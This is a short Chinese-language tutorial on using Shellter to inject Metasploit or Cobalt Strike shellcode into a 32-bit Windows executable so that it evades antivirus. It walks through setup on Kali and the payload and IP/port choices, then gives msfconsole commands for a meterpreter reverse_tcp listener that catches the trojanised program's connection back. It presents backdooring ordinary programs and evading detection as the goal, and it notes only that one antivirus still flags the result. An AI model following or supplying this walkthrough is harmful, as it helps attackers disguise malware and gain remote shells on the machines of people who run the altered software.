Shellcode注入工具Shellter

01.png

介绍

Shellter 是一款动态 shellcode 注入工具，我们可以将shellcode注入到其它程序上，从而来躲避杀毒软件的查杀。shellcode可以是自己写的也可以是使用MSF或者CS生成的。目前Shellter的最新版本是v7.2

下载地址：https://www.shellterproject.com/

两种模式，自动模式和管理模式（更自由属于高级模式）

02.png

安装

在kali上使用需要安装wine和wine32(可以让linux运行exe)，wine是kali自带，使用如下命令安装wine32

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

选择一个exe可执行文件(32位)

03.png

是否启用隐身模式，建议不启用，可以增加免杀效果

04.png

选择payload，这里选择本地自带的payload

05.png

设置IP和Port

06.png

可以看到进行注入后的程序甚至比原程序更小了，有点离谱。

07.png

上线msf

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.182.61.116
set lport 4444
exploit  //监听

08.png

使用火绒进行查杀，发现可以被识别。

09.png